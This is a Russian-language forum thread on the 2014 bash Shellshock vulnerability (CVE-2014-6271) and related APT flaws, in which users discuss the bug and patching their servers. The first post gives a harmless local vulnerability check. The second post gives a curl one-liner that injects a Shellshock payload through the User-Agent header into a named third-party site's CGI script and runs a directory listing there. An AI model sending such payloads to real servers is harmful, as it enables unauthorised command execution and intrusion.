Рейтинг темы:
  • 0 Голос(ов) - 0 в среднем
  • 1
  • 2
  • 3
  • 4
  • 5
Дырища в bash
#1
Опубликованы подробности уязвимости CVE-2014-6271 в bash, которая позволяет злоумышленнику произвести удалённое выполнение кода.

Уязвимость возможна благодаря одной из особенностей bash - использования переменных окружения для экспорта функций (если в переменной содержится "() {", то её содержимое будет интерпретировано как функция). Проблема заключается в том, что обработка продолжается даже после символа «}», поэтому, если добавить любую команду — она будет выполнена. Атаке подвержены sshd, Git и Subversion (при определённых обстоятельствах), Apache с mod_cgi или mod_cgid (если скрипты CGI написаны на bash или вызывают bash-скрипты), клиенты DHCP (если они вызывают скрипты для настройки системы), CUPS и вообще любые приложения, которые запускают bash (или bash-скрипты) и могут устанавливать переменные окружения на основе данных, полученных извне.

Для проверки наличия уязвимости в системе можно выполнить команду

Код:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Если система уязвима, в консоль будут выведены строки «vulnerable» и «this is a test», а при отсутствии уязвимости, сообщение об ошибке вида

Код:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

Обновление с исправлением уязвимости уже выпущено для некоторых популярных дистрибутивов.

Кроме того, объявлено об исправлении множественных уязвимостей в пакетном менеджере APT. Уязвимости CVE-2014-0487, CVE-2014-0490, CVE-2014-0488 и CVE-2014-0489 позволяют обойти проверку цифровых подписей пакетов и репозиториев, а уязвимость CVE-2014-6273 - выполнение произвольного кода, отправленного злоумышленником, вмешавшимся в трафик.


Proof: lor
А ты %username% уже обновил свой баш?

Когда прочитал данную новость, немного офигел. Пришлось подрываться и обновлять сервера Sad
Рано я радовался... Обход патча -> opennetПротестил на дебе, уже закрыли. Арч - решето.
m0nster.art - clear client patches, linkz to utils & code.
Гадаю по капче.
Ответ
#2
ReanimatoR Написал:парни погодите я в процессе...
[Изображение: 48632c6be0db468e67d5b1b1a0357ce2.gif]

Если кому интересно вот вам PoC пример Wink

curl http://g(антигугол)otds.ru/geto(антигугол)s.cgi -A '() { x;};echo;/bin/ls -la'

[Изображение: 25286ffb0d1846b2dd90148b78c28f5b.png]

Я тут весь на панике и ты еще подливаешь масла в огонь Sad Протестил обход у себя - уже пофиксили. Хоть что-то радует.
Пришлось на арче погасить веб сервак. Надеюсь, что завтра пофиксят.
m0nster.art - clear client patches, linkz to utils & code.
Гадаю по капче.
Ответ
#3
"теперь скрипты секурнее на c++ накатать" (с) anonymous

Очередная дырка в баше... Я уже устал обновляться. В дебиане все пучком.
Proof: lor
m0nster.art - clear client patches, linkz to utils & code.
Гадаю по капче.
Ответ


Перейти к форуму:


Пользователи, просматривающие эту тему: 1 Гость(ей)